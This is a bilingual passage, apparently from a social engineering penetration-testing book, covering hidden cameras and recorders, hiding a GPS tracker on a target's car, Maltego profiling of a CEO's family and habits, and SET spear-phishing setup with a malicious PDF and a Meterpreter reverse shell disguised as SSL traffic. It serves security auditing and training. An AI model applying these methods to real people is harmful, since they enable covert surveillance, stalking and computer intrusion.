这些原则也适用于录音。用录音设备记录电话或对话的目的与前面提到的视频目的相同。这里要提到的一个重点是,在世界许多地区,未经他人同意而录音都是违法的。确保您使用录音设备的能力是您与公司签署的社会工程合同的一部分。

These principles also apply for audio recording. Capturing a phone call or conversation on a recording device serves all the same purposes as the ones mentioned previously for video. An important point to mention here is that recording people without their consent is illegal in many areas of the world. Make sure your ability to use recording devices is part of the social engineering contract you have signed with the company.

 

录音设备有各种形状和尺寸。我有一台小型录音机,它是一支真正的好用的笔。这台设备可以舒适地放在我的前口袋里,并且可以清晰地记录 20 英尺外的声音。有了 2 GB 的内部存储空间,我可以轻松无忧地录制几个小时的对话,然后稍后进行分析。

Audio recording devices come in all shapes and sizes. I own a small voice recorder that is a real working pen. This device sits nicely in my front pocket and records sound clearly up to 20 feet away. With 2 GB of internal storage I can easily record a couple hours of conversation without worry and then analyze it later on.

 

相机

Cameras

 

如今,你可以找到各种形状的摄像头,如按钮、钢笔、隐藏在钢笔尖中、时钟、泰迪熊、假螺丝头、烟雾报警器内,以及基本上任何你能想到的设备。找到如图7-10所示的摄像头并不难。

Nowadays you can find cameras shaped like buttons; pens; hidden in the tips of pens; inside clocks, teddy bears, fake screw heads, smoke alarms; and basically any other device you can imagine. Locating a camera like the one shown in Figure 7-10 isn’t too hard.

 

图7-10:相机隐藏在领带结中。

Figure 7-10: The camera is hidden in the knot of the tie.

 
f0710.tif
 

是的,信不信由你,这条领带里藏着一个全彩摄像头,它使用 12 伏电池供电,并连接到一个微型录音设备。戴着这条领带参加社会工程审计,可以确保你以 70 度角捕捉到一切。

Yes, believe it or not, this tie is hiding a full-color camera that runs on a 12-volt battery and connects to a mini recording device. Wearing this tie into a social engineering audit ensures you capture everything within a 70-degree angle.

 

使用这样的录音设备有一个好处。社会工程师可以专注于自己事先练习过的借口或诱导,而不必担心记住每一个细节。

Using a recording device like this gives an advantage. The social engineer can focus on the pretext or the elicitation that he or she practiced beforehand without having to worry about trying to remember every detail.

 

我喜欢讲的一个故事是我在一次审计中使用录音设备,当时我正在测试一个在线销售门票的主题公园。这家公司经营着一个小型售票窗口,窗口后面有一名妇女,负责操作一台装有 Windows 操作系统的计算机。借口是我在酒店在线购买了门票,但无法打印出来。为了提供帮助,我将它们打印成 PDF 并通过电子邮件将文档发送给自己。然后,我使用了类似这样的话:“我知道这是一个奇怪的请求,但我女儿在一家餐厅看到了您的广告。我们回到酒店,用折扣代码在线购买了门票,然后我意识到我无法打印出来。酒店的打印机坏了,我不想丢失门票。所以我将它们打印成 PDF 并发送到我的电子邮件帐户。我可以直接登录还是让您登录我的电子邮件来获取文档?”当然,“孩子们”在场边等着,作为父亲,我不想让人失望。果然,当员工点击 PDF 时,她看到的不是我们的票,而是一段恶意代码,这段代码被编写成允许我访问她的计算机并开始自动收集数据。记录对话、使用的方法和被拉动的心弦有助于教育公司,这样这种攻击就不会再次发生,从而避免损失数千美元甚至更多。

One story I like to tell is how I used an audio recording device in an audit where I was testing a theme park that sells tickets online. This company operates a small ticket window with one woman behind it manning a computer with a Windows operating system on it. The pretext was that I bought tickets online in the hotel but couldn’t print them out. To assist I printed them to PDF and emailed the document to myself. I then used a line similar to this: “I know this is an odd request, but my daughter saw your ad at a restaurant. We went back to the hotel and bought the tickets online with the discount code and then I realized I couldn’t print them out. The hotel printer was on the fritz and I didn’t want to lose the tickets. So I printed them to a PDF and sent it to my email account. Could I just log in or have you log in to my email to get the document? “ Of course, the “kids” were waiting in the sidelines and as a dad I didn't want to disappoint. Sure enough as the employee clicked the PDF, she wasn’t presented with our tickets but a malicious piece of code that was scripted to give me access to her computer and start autocollecting data. Recording the conversation, the method used, and the heart strings that were pulled helped to educate the company so this attack could not be repeated, costing it thousands or more dollars.

 

有一种可用的设备使用“随用随付”手机卡通过手机信号向任何已设定的号码发送音频内容。或者,社交工程师可以随时打电话了解情况。这种设备可以让社交工程师节省数十个小时的时间来获取密码或个人信息,以便用于社交工程攻击。

One device that is available uses a “pay-as-you-go” cellular card to send audio content via a cellular signal to any number programmed. Or the social engineer can call in and hear what is going on at any time. This device can save the social engineer dozens of hours in obtaining passwords or personal information that she can use in a social engineering attack.

 

人们可以花上几十个小时(我可以写几十页)来谈论市面上所有漂亮又酷炫的相机。图7-117-12展示了来自一家知名执法机构“间谍设备”提供商 ( www.spyassociates.com ) 的几张图片。信不信由你,所有这些图片都是隐藏的相机或录音设备。您可以使用这些设备中的每一个来秘密记录目标以供日后检查。

One can spend literally dozens of hours (and I could write dozens of pages) talking about all the neat and cool cameras out there. Figures 7-11 and 7-12 show a few pictures from a popular law enforcement provider of “spy equipment” (www.spyassociates.com). All of these pictures are hidden cameras or audio recording devices, believe it or not. You can use each of these devices to covertly record a target for later inspection.

 

图 7-11:除了笔(它是一个录音机)之外,所有这些设备都通过隐藏的摄像头捕捉音频和彩色视频。

Figure 7-11: All of these devices capture audio and color video from a hidden camera except for the pen, which is an audio recorder.

 
f0711.tif
 

图 7-12:这些设备还可以从隐藏的摄像机捕获音频和视频。

Figure 7-12: These devices also capture audio and video from hidden cameras.

 
f0712.tif
 

使用社会工程师的工具

Using the Tools of a Social Engineer

 

上一节概述了目前存在的一些不同类型的录音设备,但问题仍然是如何使用它们。虽然看起来令人惊讶,但使用摄像头或录音设备遵循的原则与社会工程学的任何其他工具(例如借口或诱导)相同。

The preceding section outlines some of the different types of recording devices out there, but the question is still how to use them. Amazing as it seems, using cameras or recording devices follows the same principles as any other tool of the social engineer, such as pretexting or elicitation.

 

练习是必不可少的。如果您没有确定随身摄像头或录音设备的正确位置,最终可能会拍摄到天花板的视频或模糊的声音。设置您可能携带的适当服装和装备并找到摄像头或音频设备的正确位置是一个好主意。尝试坐着、站着或走路,看看这些动作如何影响声音和视频质量。

Practice is essential. If you don’t determine the proper placement for a body-worn camera or audio recording device, you might end up capturing video of the ceiling or audio of a muffled voice. Setting up the appropriate outfit and gear you might carry and finding the right location for the camera or audio device is a good idea. Try sitting, standing, or walking and see how these movements affect the sound and video quality.

 

从专业社会工程师的角度来看,我必须再次强调签订合同以概述您的记录能力的重要性。在没有合同的情况下这样做可能会成为一场法律噩梦。检查当地法律以确保使用这些设备不会惹上麻烦也是一个好主意。

From a professional social engineer standpoint I must stress again the seriousness of getting the contract to outline your ability to record. Doing it without a contract can be a legal nightmare. Checking the local laws to make sure you cannot get in trouble for use of these devices is also a good idea.

 

社会工程师绝不会使用这些设备来记录人们处于尴尬境地的情况或捕捉人们的个人情况。

Never would a social engineer use these devices to record people in embarrassing situations or to capture people in personal circumstances.

 

关于这个话题的讨论可以一直持续下去,但希望这个关于可用工具及其使用方法的简要概述可以为社会工程师提供更多的选择。

Discussion on this topic can go on and on, but hopefully this brief overview of the tools that are available and how to use them can open up the options out there to social engineers.

 

在下一节中,我将给出一些对社会工程师非常有用的工具的使用示例。

In the next section I will give a few examples of the usage of certain tools that can be very useful to a social engineer.

 

使用 GPS 追踪器

Using a GPS Tracker

 

社会工程师经常希望在目标离开办公室之前或之后对其进行跟踪。目标在去办公室的路上停留的地点可以透露很多有关他的信息。收集和分析这些信息有助于制定适当的借口或提出好的问题,以便从目标那里得到正确的回应。了解他一天的开始和结束时间对于物理红队攻击也很有价值,红队的目标是真正闯入并恢复有价值的资产,以向公司展示他们的物理弱点。

Social engineers often want to track targets before or after they leave the office. What stops the target makes on the way to the office can tell a lot about him. Compiling and analyzing this information can help to develop a proper pretext or good questions to use to elicit the right response from the target. Knowing the start and end times for his day can also be valuable for physical red team attacks, where the goal of the team is to actually break in and recover valuable assets to show the company their physical weaknesses.

 

跟踪人员的方法有很多种,但其中一种方法是使用专门设计用于帮助跟踪目标的设备。GPS 跟踪器就是这样一种设备;例如,著名的 SpyHawk SuperTrak GPS Worldwide Super TrackStick USB 数据记录器,可从www.spyassociates.com购买。这些设备种类繁多,价格从 200 美元到 600 美元不等。SpyHawk SuperTrak 磁力吸附在车辆上,可以存储目标数天的数据。以下部分将介绍从设置到使用这个小设备的全过程。

You can track people in many different ways, but one way is to use a device designed to help track a target. One such device is a GPS Tracker; for example, the notable SpyHawk SuperTrak GPS Worldwide Super TrackStick USB Data Logger available from www.spyassociates.com. One type of many, these devices can range from $200–600. SpyHawk SuperTrak magnetically sticks to a vehicle and can store days’ worth of data on the target. The following sections provide a walkthrough from setup to usage of this little device.

 

SpyHawk SuperTrak GPS TrackStick

The SpyHawk SuperTrak GPS TrackStick

 

安装使设备运行所需的软件非常简单。只需单击设备附带的软件并按照屏幕上的步骤操作即可安装所有需要的软件。安装没有任何问题,之后的设置也同样简单。TrackStick 屏幕(如图7-13所示)使用起来非常直观,设置也很容易。

Installing the software needed to make the device run is painless. Just clicking the software that came with the device and following the on-screen steps will install all the software needed. It installs without any problems and the setup afterwards is equally as painless. The TrackStick screen, shown in Figure 7-13, is very intuitive to use and easy to set up.

 

图 7-13: TrackStick Manager 采用直观、易于使用的界面。

Figure 7-13: TrackStick Manager employs an intuitive, simple-to-use interface.

 
f0713.tif
 

如您所见,它提供了选择日志时间、时区和更多自定义选项的选项。

As you can see, it provides options to chose log times, time zones, and more custom options.

 

使用 SpyHawk TrackStick

Using the SpyHawk TrackStick

 

SpyHawk SuperTrak GPS Worldwide Super TrackStick 设备本身重量轻,易于使用和隐藏。它配有一个开/关开关,但采用了一些巧妙的技术。当它感觉到运动时,它会打开并开始记录。当运动停止一段时间时,它会停止记录。

The SpyHawk SuperTrak GPS Worldwide Super TrackStick device itself is lightweight and easy to use and hide. It comes with an on/off switch but has some neat technology. When it feels movement it turns on and starts logging. When the movement stops for a period of time, it stops logging.

 

说明书上说要把设备藏在某个地方,让强力磁铁吸住金属,但设备要朝上或朝向塑料。第一次使用时丢失设备总是令人担心,所以在引擎盖下找到一个安全的地方可以缓解这些担忧,并方便查看天空。一旦您能够(内部或外部)进入目标的汽车,请在车轮舱、引擎盖下或汽车后备箱附近找到一个安全的位置。任何有金属的地方都可以。如果您有内部访问权限,打开引擎盖并将其放在发动机舱的某个地方可以减轻被发现和/或丢失的担忧。

The directions say to hide the device somewhere with the powerful magnets against metal but the device pointing up or toward plastic. Losing the device on its first run is always a concern, so finding a nice secure place under the hood can ease those worries and give easy access to the sky view. Once you have access (either internal or external) to the target’s car, find a secure location in a wheel well, under the hood, or in the back of the car by the trunk. Anywhere that there is metal will work. If you have internal access, popping the hood and putting it somewhere in the engine compartment can ease concerns over discovery and/or loss.

 

在我的第一次测试中,我在发动机舱内找到了一个放置设备的地方。即使隔着引擎盖的金属,设备也能完美记录。另一个放置想法是等到目标的汽车解锁后,将其放在后备箱的地毯下或尾灯旁边。就我个人而言,当我进行这项测试时,设备持续了五天收集数据,其中一些数据您可以在下图中看到。如图7-14所示,看起来目标喜欢加速。

In my first tests, I found a place in the engine compartment to place the device. Even through the metal of the hood the device logged perfectly. Another placement idea is to wait until the target’s car is unlocked and then place it in the trunk under the carpet or by the rear lights. On a personal side note, when I ran this test, the device stayed on five days collecting data, some of which you can see in the following figures. As shown in Figure 7-14, it looks like the target likes to speed.

 

图7-14:目标喜欢加速。

Figure 7-14: The target likes to speed.

 
f0714.tif
 

时间、日期和持续时间戳可以帮助您勾勒出目标的运动,如图7-15所示。

Time, date, and duration stamps help you outline a target’s movement, as shown in Figure 7-15.

 

图 7-15:跟踪目标的运动。

Figure 7-15: Tracking the target’s movements.

 
f0715.tif
 

图 7-16显示了 Google 地球地图上的图标——它们显示速度、时间、停止时间等等。

Figure 7-16 shows the icons on a Google Earth map—they show speed, times, time stopped, and more.

 

图 7-16: Google Earth 中呈现的设备输出。

Figure 7-16: Device output rendered in Google Earth.

 
f0716.tif
 

如图7-17所示,软件创建了整个路线的精美地图。

As you can see in Figure 7-17, the software creates nice maps of the whole route.

 

图 7-17:使用 SuperTrack 绘制目标路线。

Figure 7-17: Mapping the target’s route with SuperTrack.

 
f0717.tif
 

使用 Google Earth 或 Google Maps 您甚至可以获得特写照片(见图7-18)。

Using Google Earth or Google Maps you can even get close-ups (see Figure 7-18).

 

图 7-18:瞄准目标的行进路线。

Figure 7-18: Zeroing in on the target’s travels.

 
f0718.tif
 

查看 GPS 追踪器数据

Reviewing the GPS Tracker Data

 

数据收集是社会工程师最受益的地方。能够追踪目标公司 CEO 每次停下来喝咖啡的时间、他最喜欢的商店以及他去的健身房,可以让社会工程师策划出成功率最高的攻击。

The data collection is where a social engineer will see the most benefit. Being able to track every time the CEO of the target company stopped for coffee, what his favorite shop is, and what gym he attends can enable the social engineer to plan an attack with the highest rate of success.

 

了解地点和站点可以让攻击者知道哪里是复制 RFID 徽章或复制钥匙的最佳机会。好处是,您可以获得这些信息,而不必像隔壁的怪人一样跟踪目标。下图显示了这些细节如何让攻击者占上风。

Knowing the locations and stops can tell the attacker where he or she will have the best opportunities for cloning an RFID badge or making an impression of a key. The bonus is that you can get this information without having to stalk the target by being the creepy guy next door. The following figures show how these details can give the attacker the upper hand.

 

注意图 7-19中的细节。你可以看到目标的行驶速度,以及他停车的时间和日期。如果你想更详细地查看位置,请点击 Google 地图链接。点击导出按钮将整个数据集导出到可点击的 Google 地图或 Google 地球地图。

Notice the detail in Figure 7-19. You can see the speed the target drove, and the time and date he stopped. If you want to see the location in more detail, click the Google Maps link. Click the Export button to export the whole data set to a clickable Google Map or Google Earth Map.

 

图 7-19:数据集。

Figure 7-19: The data set.

 
f0719.tif
 

在Google Earth中打开数据集后,可以看到他停留的点、往返目的地所走的路线以及停留的时间,如图7-20所示。

After you open the data set in Google Earth you can see the points he stopped, the route he took to and from his destination, and the times he stopped, as shown in Figure 7-20.

 

图 7-20:沿途停靠站点。

Figure 7-20: Stops along the way.

 
f0720.tif
 

如果你想查看他的整个路线,没问题——只需将他的整个路线导出为多种格式之一,如图7-21所示。

If you want to see his whole route, it’s no problem—just export his whole route to one of many formats, as shown in Figure 7-21.

 

图7-21:导出目标的完整路线。

Figure 7-21: Exporting the target’s entire route.

 
f0721.tif
 

图 7-22显示了导出并显示在 Google 地图中的数据。

Figure 7-22 shows the data exported and displayed in Google Maps.

 

这一小节不可能涵盖社会工程师可用的所有工具。成功的关键在于实践和研究。了解社会工程师可以使用哪些工具可以决定审计的成败。但这只是成功的一半,因为作为一名专业的社会工程师,你必须练习、练习、再练习。知道如何正确使用这些工具将会带来巨大的不同。

This short section could not possibly cover all the tools available to a social engineer. The keys to success are practice and research. Knowing what tools are available to social engineers can make or break the audit. That is just half the battle, though, because then as a professional social engineer, you must practice, practice, practice. Knowing how to properly use the tools will make a huge difference.

 

在位于www.social-engineer.org的社会工程师框架上,我将回顾社会工程师可以用来提高其实践能力的许多工具。

On the Social Engineer Framework located at www.social-engineer.org, I will be reviewing many tools that social engineers can use to enhance their practice.

 

不过,物理工具只是成为一名成功的社会工程师的一部分。地球上的所有物理工具都以高质量和全面的信息收集为后盾,如第 2 章所述。下一节将介绍世界上一些最令人惊叹的信息收集工具。

Physical tools are just one part of being a successful social engineer though. All the physical tools on Earth are backed up by quality and thorough information gathering as discussed in Chapter 2. The next section covers some of the most amazing information-gathering tools in the world.

 

图 7-22:谷歌地图中呈现的目标路线。

Figure 7-22: The target’s route rendered in Google Maps.

 
f0722.tif
 

在线信息收集工具

Online Information-Gathering Tools

 

如前所述,信息收集是社会工程学的一个关键方面。如果在这一点上投入的时间不够,就会导致社会工程师的失败。如今,社会工程师可以使用许多工具来帮助收集、分类和利用收集到的数据。

As previously discussed, information gathering is a key aspect of social engineering. Not spending enough time on this point alone can and will lead to failure for the social engineer. Nowadays many tools are available to the social engineer that can help collect, catalog, and utilize the data that is collected.

 

这些工具可以彻底改变社会工程师查看和使用数据的方式。社会工程师不再局限于在日常搜索中找到的内容;这些工具为他们打开了互联网上的所有资源。

These tools can literally change the way a social engineer views and uses data. No longer are social engineers limited to what they can find in routine searches; these tools open every resource on the Internet to them.

 

马尔特戈

Maltego

 

收集和分类信息可能是许多人的弱点。如果有一种工具可以让你针对某个域、IP 地址甚至某个人执行数十次搜索,情况会怎样?如果它能为你提供这些结果的权重,显示哪些信息更重要或不重要,情况会怎样?如果这个工具有一个 GUI 界面,以颜色编码的对象显示所有内容,你可以导出和使用,情况会怎样?最重要的是,如果这个神奇的工具有免费版本,情况会怎样?

Collecting and cataloging information is probably a weak point for many people. What if a tool existed that enabled you to perform dozens of searches specific to a domain, IP address, or even a person? What if it gave you the weightings of those findings, showing what was more likely to be important or not? What if this tool then had a GUI interface that showed everything in color-coded objects that you can export and utilize? On top of it all, what if a free version of this amazing tool was available?

 

进入 Maltego。Maltego 是社会工程师梦寐以求的工具。这个神奇的工具是由 Paterva ( www.paterva.com )的家伙制作的。Maltego 有一个社区版,可从其网站免费下载,该版本也包含在 BackTrack4 的每个版本中。如果您想消除免费版的限制(例如您可以运行的转换次数和保存数据),花费约 600 美元即可获得完整许可证。

Enter Maltego. Maltego is a social engineer’s dream tool. This amazing tool is made by the guys at Paterva (www.paterva.com). Maltego has a community edition available for free download from their website, which is also included in every edition of BackTrack4. If you want to remove the limitations of the free edition—like the number of transforms you can run and saving data—spending around $600 will get you a full license.

 

展示 Maltego 强大功能的最好方式是讲述我参与的一次审计的故事。我被委托审计一家网络业务规模很小的小公司。目标是找到 CEO,但他戒备森严、多疑,很少使用网络。作为一家印刷公司的老板,他只顾着做生意,没有充分利用技术。这项任务肯定很困难。

The best way to show the power of Maltego is to tell a story of an audit I was involved in. I was tasked with auditing a small company that had a very small web presence. The target was to get to the CEO but he was heavily guarded, paranoid, and didn’t use the web much. As the owner of a printing company he was all about his business and didn’t use technology to its fullest. Surely this task was going to be a difficult one.

 

我首先打开了 Maltego。仅使用公司的域名并提取与 Whois 信息相关的所有电子邮件地址以及域名本身,我就有了一个很好的信息基础,可以开始搜索。然后,我深入研究了出现的 CEO 的电子邮件是否在其他网站或 URL 上使用过。我发现他为一家当地餐馆写了几篇评论,并公开链接了他的电子邮件地址。他还在为另一个州的一家餐馆写的评论中使用了这个电子邮件地址。阅读他的评论可以充分表明,他在探望该州的家人时曾光顾过这家餐馆,甚至在评论中提到了他的兄弟。在 Maltego 中搜索了几次后,我找到了他在该地区的父母和兄弟。用姓氏搜索了几次,我找到了几个链接,这些链接谈到他使用另一封电子邮件(他在那里创办的企业)来讨论他与当地教堂遇到的问题以及他换教堂的原因。后来,我发现了一篇博客文章,其中链接了他的 Facebook 页面,上面有他家人离开他们最喜欢的球队参加的一场球赛后的照片。以下是我使用 Maltego 在不到两个小时的搜索中发现的内容:

I whipped out Maltego first. Using just the company’s domain and pulling up all e-mail addresses linked with Whois info and the domain itself gave me a nice base of information to start searching with. I then delved deeper to see whether the CEO’s email that came up was used on any other sites or URLs. I found he had written a couple reviews for a local restaurant and linked his email address publicly. He also used it in a review he did for a restaurant in a different state. Reading his review fully revealed that he had visited that restaurant when he was visiting family in that state, even naming his brother in the review. With a few more searches in Maltego I located his parents and brother in that area. A few more searches with the family name and I found a few links that spoke about using another email he had from a business he started there to discuss a problem he had had with a local church and his switch to a new one. Later on, I found a blog post linking his Facebook page with pictures of his family after they left a ball game where their favorite team played. Here is what I was able to find in less than two hours of searching using Maltego:

 
 
     
  • 他最喜欢的食物
  • His favorite food
  •  
     
  • 他最喜欢的餐厅
  • His favorite restaurant
  •  
     
  • 他孩子的名字和年龄
  • His kids’ names and ages
  •  
     
  • 他离婚了
  • That he is divorced
  •  
     
  • 他父母的名字
  • His parents’ names
  •  
     
  • 他兄弟的名字
  • His brother’s name
  •  
     
  • 他长大的地方
  • Where he grew up
  •  
     
  • 他的宗教
  • His religion
  •  
     
  • 他最喜欢的运动队
  • His favorite sports team
  •  
     
  • 他的全家人长什么样子
  • What his whole family looked like
  •  
     
  • 他过去的生意
  • His past business
  •  
 

一天后,我给目标客户寄了一个包裹,里面有当地企业抽奖的信息。如果目标客户中奖,他将在他最喜欢的餐厅免费享用一顿晚餐,并获得三张洋基队比赛的免费门票。目标客户只需同意与销售代表举行一次简短的会议,讨论当地的一家慈善机构。如果目标客户同意参加会议,其名称将参加抽奖,有机会赢得洋基队门票。我的代言人是“乔”,我准备了一份给首席执行官打电话的提纲。我的目标是让他接受我提供的 PDF 文件,其中概述了我们想要的内容,并让他参加抽奖。当我打电话时,他应该已经收到了我“邮寄”的包裹,我可以轻松地说:“是的,他正在等我的电话。”

A day later I mailed a package to the target containing information about a raffle for local businesses. The offer was that if he wins he gets a free dinner at the restaurant he listed as his favorite, and three free tickets to a Yankees game. All the business has to do is agree to have a short meeting with a sales rep to talk about a local charity. If the business agreed to that meeting its name would be entered into the raffle for a chance to win the Yankees tickets. My pretext’s name was “Joe” and I prepared an outline for a call to the CEO. My goal was to get him to accept a PDF from me that outlined what we want and entered him in the drawing. By the time I called, he should have received my “mailed” package and I could easily use the line, “Yes, he is expecting my call.”

 

在与“Joe”通话时,该首席执行官接受并打开了一封电子邮件,其中包含所有抽奖详细信息以及恶意编码的文件,确保反向 shell 的传递,使我能够访问他的网络。

While on the phone with “Joe,” the CEO accepted and opened an email containing all the raffle details as well as a maliciously encoded file, ensuring the delivery of the reverse shell, giving me access to his network.

 

当然,他的屏幕上什么也没有,Adobe 不断崩溃,这让他很沮丧。我告诉他,“很抱歉您在打开文件时遇到问题;我们会将您的名字列入抽奖活动,并在今天向您邮寄一些附加信息。”但在包裹寄出之前,我召开了一次报告会议,讨论目标是如何被彻底攻陷的。

Of course, he got nothing on his screen and was frustrated that Adobe kept crashing. I told him, “I’m sorry you are having problems opening the file; we will include your name in the raffle and mail out some additional info to you today.” But before that package went into the mail and arrived I called a report meeting to discuss how the target was completely compromised.

 

这一成功主要归功于一个工具 — Maltego。它帮助收集、组织和分类数据,以便最佳利用。

The majority of this success was due to the use of one tool—Maltego. It helped collect, organize, and categorize data for the best use.

 

Maltego 是如何帮助我在这场演出中取得成功的?

How did Maltego help me succeed in this gig?

 

可以将 Maltego 视为一个关系信息数据库,用于查找互联网上信息片段(称为应用程序内的实体)之间的链接。Maltego 还从挖掘电子邮件地址、网站、IP 地址和域信息等信息中消除了大量的艰苦工作。例如,只需单击几下,您就可以自动搜索目标域或域中的任何电子邮件地址。只需在屏幕上添加“EMAIL”转换,然后单击框并输入要搜索的电子邮件,我就会得到如图7-23所示的视图。

Think of Maltego as a relational database of information, finding links between bits of information on the Internet (referred to as entities within the application). Maltego also takes a lot of the hard work out of mining information such as email addresses, websites, IP addresses, and domain information. For example, you can search for any email address within a target domain or domains automatically with a few clicks. By simply adding the “EMAIL” transform on the screen then clicking in the box and typing the email I want to search for, I was given a view like what is seen in Figure 7-23.

 

图 7-23:您可以从 Maltego 收集到的信息的表示。

Figure 7-23: A representation of the information you can glean from Maltego.

 
f0723.tif
 

为什么使用 Maltego?

Why Use Maltego?

 

Maltego 为用户自动完成大量信息收集和大数据关联,节省了用户在 Google 上搜索信息和确定所有信息如何关联的时间。找到这些数据关系是 Maltego 真正发挥作用的地方。虽然挖掘很有用,但发现信息之间的关系才是社会工程师的真正优势。

Maltego automates much of the information gathering and large data correlation for the user, saving hours of Googling for information and determining how all that information correlates. Finding these data relationships is where the real power of Maltego comes into play. Although the mining is useful, discovering the relationships between the information is what will help the social engineer.

 

我在www.social-engineer.org/se-resources/上发布了一些视频,概述了如何使用 Maltego 来获得最大收益。在早期的故事中,Maltego 为演习的成功做出了巨大贡献,但妥协带来了另一个惊人的工具。

At www.social-engineer.org/se-resources/, I have posted a few videos outlining how to use Maltego to get the most out of it. In the earlier story Maltego contributed largely to the exercise’s success, but the compromise came with another amazing tool.

 

SET:社会工程师工具包

SET: Social Engineer Toolkit

 

社会工程师花费大量时间来完善其技能的人性化方面,但许多攻击媒介需要能够生成嵌入恶意代码的电子邮件或 PDF。

Social engineers spend much of their time perfecting the human aspect of their skills, yet many attack vectors call for the ability to produce emails or PDFs embedded with malicious code.

 

这两件事都可以使用 BackTrack 中的许多工具手动完成,但当我启动www.social-engineer.org网站时,我与我的好朋友 Dave Kennedy 进行了交谈。Dave 是一款非常流行的工具 FastTrack 的创建者,该工具使用 Python 脚本和 Web 界面自动执行渗透测试中使用的一些最常见攻击。我告诉 Dave,我认为开发类似 FastTrack 的东西是个好主意,但只针对社交工程师 — 一款允许社交工程师通过几次点击创建 PDF、电子邮件、网站等的工具,然后将更多精力放在社交工程的“社交”部分。

Both of these things can be done manually using many of the tools that exist in BackTrack, but when I was starting the www.social-engineer.org website I was talking to a good friend of mine, Dave Kennedy. Dave is the creator of a very popular tool called FastTrack that automated some of the most common attacks used in a penetration test using Python scripts and a web interface. I told Dave that I thought it would be a neat idea to develop something like FastTrack but just for social engineers—a tool that would allow a social engineer to create PDFs, emails, websites, and more with a few clicks and then focus more on the “social” part of social engineering.

 

Dave 仔细考虑后决定编写几个简单的 Python 脚本,让社交工程师可以创建 PDF 并发送嵌入恶意代码的电子邮件。这就是社交工程师工具包 (SET) 的诞生。截至撰写本文时,SET 的下载量已超过 150 万次,并迅速成为社交工程审计的标准工具包。本节将向您介绍 SET 的一些要点及其使用方法。

Dave thought it over and decided that he could create a few easy Python scripts that would allow the social engineer to create PDFs and send emails with malicious code embedded in them. This was the birth of the Social Engineer Toolkit (SET). At the time of writing, SET had been downloaded more than 1.5 million times, and had quickly become the standard toolkit for social engineering audits. This section walks you through some of the main points of SET and how to employ them.

 

安装

Installation

 

安装很简单。你只需要安装 Python 和 Metasploit 框架。这两者都安装在 BackTrack 发行版中,无需担心设置问题 — 在 BackTrack 4 中甚至安装了 SET 工具。如果没有安装或者你是从头开始安装,安装也很简单。导航到你想要的目录并在控制台窗口中运行此命令:

Installation is simple. All you need to have installed are Python and the Metasploit framework. Both of these are installed in the BackTrack distribution and there is no setup to worry about—in BackTrack 4 even the SET tool is installed. In case it is not or you are starting from scratch, installation is simple. Navigate to the directory you want it in and run this command in a console window:

 

svn co http://svn.secmaniac.com/social_engineering_toolkit 设置/

svn co http://svn.secmaniac.com/social_engineering_toolkit set/

 
 

执行此命令后,您将获得一个名为set的目录,其中包含所有 SET 工具。

After executing this command, you will have a directory called set that will contain all the SET tools.

 

运行 SET

Running SET

 

再次强调,运行 SET 的过程非常简单。只需在set目录中输入./set即可启动初始 SET 菜单。

Running SET is, again, an easy process. Simply typing ./set while in the set directory starts the initial SET menu.

 

这显示了 SET 菜单的确切样子。有关每个菜单选项的全面深入的教程可在www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_%28SET%29上找到,但以下部分将解释 SET 最广泛使用的两个方面。

This shows you exactly what the SET menu looks like. A comprehensive, in-depth tutorial about each menu option is available at www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_%28SET%29, but the following sections explain two of the most widely used aspects of SET.

 

首先讨论鱼叉式网络钓鱼攻击,接下来讨论网站克隆攻击。

First up is discussion the spear phishing attack, and following that is discussion of the website cloning attack.

 

使用 SET 进行鱼叉式网络钓鱼

Spear Phishing with SET

 

网络钓鱼是一个新术语,用来描述恶意诈骗者如何“广撒网”,利用有针对性的电子邮件试图引诱人们访问网站、打开恶意文件或泄露可用于后续攻击的信息。能够检测和缓解这些攻击对于当今互联网世界的生存至关重要。

Phishing is a term coined to describe how malicious scammers will “cast a wide net” using targeted emails to try to draw people to websites, open malicious files, or disclose information that can be used for later attacks. Being able to detect and mitigate these attacks is essential for survival in the Internet world today.

 

SET 允许审计员通过开发有针对性的电子邮件来测试他们的客户,然后记录有多少员工受到这些攻击。这些信息随后可用于培训,帮助员工了解如何发现和避免这些陷阱。

SET allows the auditor to test their clients by developing targeted emails and then logging how many employees fall for these attacks. This information can then be used in training to help employees see how to spot and avoid these traps.

 

要在 SET 中执行鱼叉式网络钓鱼攻击,请选择选项 1。按下该数字后,您将看到几个选项:

To perform a spear phishing attack in SET, chose option 1. After pressing that number you are presented with a few options:

 
 
     
  • 1. 进行群发电子邮件攻击
  • 1. Perform a Mass Email Attack
  •  
     
  • 2. 创建 FileFormat 负载
  • 2. Create a FileFormat Payload
  •  
     
  • 3. 创建社交工程模板
  • 3. Create a Social-Engineering Template
  •  
 

第一个选项是您实际发起基于电子邮件的鱼叉式网络钓鱼攻击。第二个选项是您创建恶意 PDF 或其他文件以通过电子邮件发送。最后,选项 3 是您可以创建模板以供以后使用的地方。

The first option is where you actually launch an e-mail-based spear phishing attack. The second option is where you create a malicious PDF or other file to send in your emails. Finally, option 3 is where you can create templates for use later on.

 

在 SET 中发起攻击非常简单,只需在菜单中选择正确的选项,然后单击“启动”即可。例如,如果我想发起电子邮件攻击,向受害者发送伪装成技术报告的恶意 PDF,我会选择选项 1,即执行群发电子邮件攻击。

Launching an attack in SET is as simple as choosing the right options in the menus then clicking Launch. For example, if I wanted to launch an e-mail attack that would send a victim a malicious PDF disguised as a tech report, I would chose option 1, Perform a Mass Email Attack.

 

接下来,我将选择在多个版本的 Adob​​e Acrobat Reader 中存在的攻击媒介(选项 6):Adobe util.printf() 缓冲区溢出

Next, I would choose an attack vector (option 6) that was present in many versions of Adobe Acrobat Reader: Adobe util.printf() Buffer Overflow.

 

接下来的几个选项设置了攻击的技术方面。使用 Metasploit 接收反向 shell 或从受害者的计算机返回的连接,以及重新打开的端口以避开 IDS 或其他系统,选择选项 2,Windows Meterpreter Reverse_TCP。

The next few choices set up the technical side of the attack. Using Metasploit to receive the reverse shell, or connection back from the victim’s computer, and the port to come back on to avoid IDS or other systems, choose option 2, Windows Meterpreter Reverse_TCP.

 

选择端口 443,这样流量看起来就像是 SSL 流量。SET 制作恶意 PDF 并设置侦听器。

Select port 443 so the traffic looks as if it is SSL traffic. The SET makes the malicious PDF and sets up the listener.

 

